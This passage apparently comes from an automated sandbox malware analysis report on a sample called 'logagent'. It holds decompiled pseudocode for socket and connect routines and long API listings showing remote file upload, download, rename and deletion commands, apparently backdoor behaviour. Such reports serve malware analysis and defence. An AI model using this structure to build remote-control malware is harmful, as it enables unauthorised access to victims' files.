					_push(0); // executed
					L0041418E(); // executed
					 *_t9 = _t6;
					if(_t6 != 0xffffffff) {
						 *(_t9 + 0x38) =  *(_t9 + 0x38) & 0x00000000;
						 *(_t9 + 0x39) =  *(_t9 + 0x39) & 0x00000000;
						 *((intOrPtr*)(_t9 + 0x34)) = 0x3e8;
						return _t6;
					} else {
						goto L3;
					}
				} else {
					_t6 = E00402074(); // executed
					if(_t6 == 0) {
						L3:
						return 0;
					} else {
						goto L2;
					}
				}
			}





                                  0x00402040
                                  0x00402042
                                  0x0040204d
                                  0x0040204d
                                  0x0040204f
                                  0x00402051
                                  0x00402053
                                  0x0040205b
                                  0x0040205d
                                  0x00402063
                                  0x00402067
                                  0x0040206b
                                  0x00402073
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00402044
                                  0x00402044
                                  0x0040204b
                                  0x0040205f
                                  0x00402062
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040204b

                                  APIs
                                  • socket.WS2_32(00000000,00000001,00000006), ref: 00402053
                                    • Part of subcall function 00402074: WSAStartup.WS2_32(00000202,?), ref: 00402089
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Startupsocket
                                  • String ID:
                                  • API String ID: 3996037109-0
                                  • Opcode ID: a838745da6ed8195359329033db1b7584455c5d17c7e212a85de7325608f8976
                                  • Instruction ID: 9496cea1f1e3f543e84bf9b8819d2566c755aa2e8cb9b0b358b440cdad1f8944
                                  • Opcode Fuzzy Hash: a838745da6ed8195359329033db1b7584455c5d17c7e212a85de7325608f8976
                                  • Instruction Fuzzy Hash: 0FE026204487A121EFB02B20678D3C32BC11B02738F0016AEF280769D3C3FC1485C388
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040209B Relevance: 1.5, APIs: 1, Instructions: 22networkCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 16%
                                  			E0040209B(intOrPtr* __ecx, void* _a4) {
				signed int _t3;

				_t1 = __ecx + 4; // 0x41be74
				_t3 = _t1;
				_push(0x10);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(_t3);
				_push( *__ecx);
				asm("movsd"); // executed
				L0041419A(); // executed
				asm("sbb al, al");
				return  ~_t3 + 1;
			}




                                  0x0040209f
                                  0x0040209f
                                  0x004020a8
                                  0x004020aa
                                  0x004020ab
                                  0x004020ac
                                  0x004020ad
                                  0x004020ae
                                  0x004020b0
                                  0x004020b1
                                  0x004020b8
                                  0x004020bf

                                  APIs
                                  • connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: connect
                                  • String ID:
                                  • API String ID: 1959786783-0
                                  • Opcode ID: 8f987cbbf3fb9e12a8f92e976e4f78da9b9bf78db8d1cc63ee0fa56af0114424
                                  • Instruction ID: 87562d7c3fa6cfb31469a52a797acd734afc423ba1c102534055d0d979432199
                                  • Opcode Fuzzy Hash: 8f987cbbf3fb9e12a8f92e976e4f78da9b9bf78db8d1cc63ee0fa56af0114424
                                  • Instruction Fuzzy Hash: 15D0A73308052C7AC900DDA4EC02DF7375DDB83B60F104416FE018F052C293A59691D0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00402074 Relevance: 1.5, APIs: 1, Instructions: 13networkCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 53%
                                  			E00402074() {
				char _v404;
				signed int _t2;
				char _t4;

				_t2 =  &_v404;
				_push(_t2);
				_push(0x202); // executed
				L00414194(); // executed
				asm("sbb al, al");
				_t4 =  ~_t2 + 1;
				 *0x41b730 = _t4;
				return _t4;
			}






                                  0x0040207d
                                  0x00402083
                                  0x00402084
                                  0x00402089
                                  0x00402090
                                  0x00402092
                                  0x00402094
                                  0x0040209a

                                  APIs
                                  • WSAStartup.WS2_32(00000202,?), ref: 00402089
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Startup
                                  • String ID:
                                  • API String ID: 724789610-0
                                  • Opcode ID: 85389655ccf312e74c41d41a43fd4d1fbb1ccf973644e7ce17a1e4acb925192c
                                  • Instruction ID: aaec609cd6a5438bb82df53de8e824b0c91ee93dfa3372403453e0fac8186511
                                  • Opcode Fuzzy Hash: 85389655ccf312e74c41d41a43fd4d1fbb1ccf973644e7ce17a1e4acb925192c
                                  • Instruction Fuzzy Hash: 4AC08C3149431C6DEA02A3B5990BBE5776CD35EB44F4002BAAA11830D7D384955D42B6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00990000 Relevance: .0, Instructions: 17COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.533187424.0000000000990000.00000040.00000400.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_990000_logagent.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a8f87fc558e2f538fd351bdfc49e2c6aa18e45c6a6d2c8ec1415aa36aaa266a9
                                  • Instruction ID: 18b5e61e04c7bcae5a7a9f8a09946595db22e2a0f492063f86ebefdf2a899b08
                                  • Opcode Fuzzy Hash: a8f87fc558e2f538fd351bdfc49e2c6aa18e45c6a6d2c8ec1415aa36aaa266a9
                                  • Instruction Fuzzy Hash: 33D01275914208EFDB04CF54D84589EBBF5EB44320F20C165E914973A0E731AE509A44
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  Function 00403C4A Relevance: 240.6, APIs: 121, Strings: 16, Instructions: 868fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00403C60
                                  • SetEvent.KERNEL32(?), ref: 00403C69
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00403C72
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6DF55DF0), ref: 00403C8A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 00403C9B
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00403CAA
                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 00403D11
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 00403D27
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00403D5F
                                    • Part of subcall function 00403816: CreateFileW.KERNEL32(0000FDE8,80000000,00000000,00000000,00000003,00000080,00000000,?,0041B310,00000000), ref: 00403845
                                    • Part of subcall function 00403816: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040385C
                                    • Part of subcall function 00403816: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403B9B
                                    • Part of subcall function 00403816: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403BA4
                                    • Part of subcall function 00403816: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403BAD
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 00403D7A
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Uploaded file: ,00000000,?,00000000,?,00000000,00000000), ref: 00403DB1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 00403DD6
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000004,?,?,?,?,?,?,?,00000000), ref: 00404199
                                  • atoi.MSVCRT ref: 004041A0
                                    • Part of subcall function 00403473: ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B300,00415664,[INFO],[DEBUG],00000000,?,004041B5,?,?,00000000), ref: 00403499
                                    • Part of subcall function 00403473: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 004034AC
                                    • Part of subcall function 00403473: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004034B5
                                    • Part of subcall function 00403473: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 004034CE
                                    • Part of subcall function 00403473: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,00000000), ref: 004034DB
                                    • Part of subcall function 00403473: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004034F0
                                    • Part of subcall function 00403473: recv.WS2_32(00000000,?,0000FDE8,00000000), ref: 00403517
                                    • Part of subcall function 00403473: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(?,00000000,00000000,?,0000FDE8,00000000), ref: 00403534
                                    • Part of subcall function 00403473: ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60 ref: 00403541
                                    • Part of subcall function 00403473: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00403556
                                    • Part of subcall function 00403473: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664), ref: 00403560
                                    • Part of subcall function 00403473: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000004,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00403578
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004041C3
                                    • Part of subcall function 00412718: _itoa.MSVCRT ref: 00412736
                                    • Part of subcall function 00412718: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040CC05,?,00000000,0041B310,00000000,0041B310,?), ref: 0041274A
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Downloaded file size: ,00000000,?,?,?,00000000), ref: 004041E1
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([DEBUG],?,?,?,Downloaded file size: ,00000000,?,?,?,00000000), ref: 004041EE
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404202
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000), ref: 00404223
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 0040422D
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00404237
                                    • Part of subcall function 00412D56: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,0041623C), ref: 00412D93
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040424C
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Downloaded file: ,00000000,?,00000000,?,00000000,00000000), ref: 0040427E
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Downloaded file: ,00000000,?,00000000,?,00000000,00000000), ref: 0040428B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 0040429F
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 004042AB
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004042C2
                                    • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BE70,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040244A
                                    • Part of subcall function 00402440: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60([DataStart],00000013,?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402463
                                    • Part of subcall function 00402440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040246E
                                    • Part of subcall function 00402440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000F,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040247B
                                    • Part of subcall function 00402440: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040248D
                                    • Part of subcall function 00402440: ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402498
                                    • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024A7
                                    • Part of subcall function 00402440: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024B1
                                    • Part of subcall function 00402440: send.WS2_32(?,00000000), ref: 004024BB
                                    • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402512
                                    • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040251B
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Failed to download file: ,00000000,?,00000000,?,00000000,00000000), ref: 00404300
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([ERROR],?,?,?,Failed to download file: ,00000000,?,00000000,?,00000000,00000000), ref: 00404311
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 00404325
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 00404331
                                  • closesocket.WS2_32(?), ref: 0040433A
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,?,00000000,?,00000000,00000001,00000000,00000000), ref: 004043F7
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,00000001,00000000,00000000), ref: 00404401
                                  • CreateDirectoryW.KERNEL32(00000000,?,?,00000001,00000000,00000000), ref: 00404408
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,00000001,00000000,00000000), ref: 00404414
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,00000001,00000000,00000000), ref: 00404420
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@G@Z.MSVCP60(0000002A,?,?,00000001,00000000,00000000), ref: 0040442B
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,00000000), ref: 0040443A
                                  • ?rfind@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIGI@Z.MSVCP60(0000005C,6DF55DF8,00000001,00000000), ref: 00404489
                                  • ?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000001), ref: 00404499
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,?,?), ref: 004044AE
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 004044B8
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 004044C2
                                  • _wrename.MSVCRT ref: 004044C9
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004044E0
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?), ref: 00404587
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 00404591
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040459D
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 004045A6
                                  • GetFileAttributesW.KERNEL32(00000000), ref: 004045AD
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 004045BA
                                    • Part of subcall function 00412BEE: wcscpy.MSVCRT ref: 00412C0A
                                    • Part of subcall function 00412BEE: wcscat.MSVCRT ref: 00412C1E
                                    • Part of subcall function 00412BEE: wcscpy.MSVCRT ref: 00412C2A
                                    • Part of subcall function 00412BEE: wcscat.MSVCRT ref: 00412C38
                                    • Part of subcall function 00412BEE: FindFirstFileW.KERNEL32(?,?), ref: 00412C4B
                                    • Part of subcall function 00412BEE: wcscpy.MSVCRT ref: 00412C6B
                                    • Part of subcall function 00412BEE: FindNextFileW.KERNEL32(004085F5,?), ref: 00412C83
                                    • Part of subcall function 00412BEE: wcscat.MSVCRT ref: 00412CB4
                                    • Part of subcall function 00412BEE: RemoveDirectoryW.KERNEL32(?), ref: 00412CD9
                                    • Part of subcall function 00412BEE: wcscpy.MSVCRT ref: 00412CE9
                                    • Part of subcall function 00412BEE: FindClose.KERNEL32(004085F5), ref: 00412D39
                                    • Part of subcall function 00412BEE: RemoveDirectoryW.KERNEL32(004085F5), ref: 00412D42
                                    • Part of subcall function 00412855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412860
                                    • Part of subcall function 00412855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 0041286C
                                    • Part of subcall function 00412855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412876
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 004045C9
                                  • DeleteFileW.KERNEL32(00000000), ref: 004045D0
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Deleted file: ,00000000,?,?,?,?), ref: 004045FA
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Deleted file: ,00000000,?,?,?,?), ref: 0040460B
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Unable to delete: ,00000000,?,?,?,?,00000055), ref: 00404659
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([ERROR],?,?,?,Unable to delete: ,00000000,?,?,?,?,00000055), ref: 0040466A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000055), ref: 0040467E
                                  • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000001,00415908,?,?,?,?,?,?,?,00000055), ref: 00404694
                                  • ?rfind@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIGI@Z.MSVCP60(0000005C,6DF55DF8,?,?,?,?,?,00000055), ref: 004046AC
                                  • ?resize@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEXI@Z.MSVCP60(00000001,?,?,?,?,?,00000055), ref: 004046B7
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z.MSVCP60(?,?,0000002A,?,?,?,?,?,00000055), ref: 004046CA
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,00000055), ref: 004046D6
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00000055), ref: 004046E2
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000055), ref: 004046F4
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000055), ref: 004046FD
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,0041594C), ref: 004044FA
                                    • Part of subcall function 00403325: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,00000000), ref: 0040333B
                                    • Part of subcall function 00403325: FindFirstFileW.KERNEL32(00000000,?,?,00000000), ref: 00403342
                                    • Part of subcall function 00403325: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000054), ref: 00403468
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Unable to rename file!,0041B310,00415948), ref: 00404523
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,00415948), ref: 0040452D
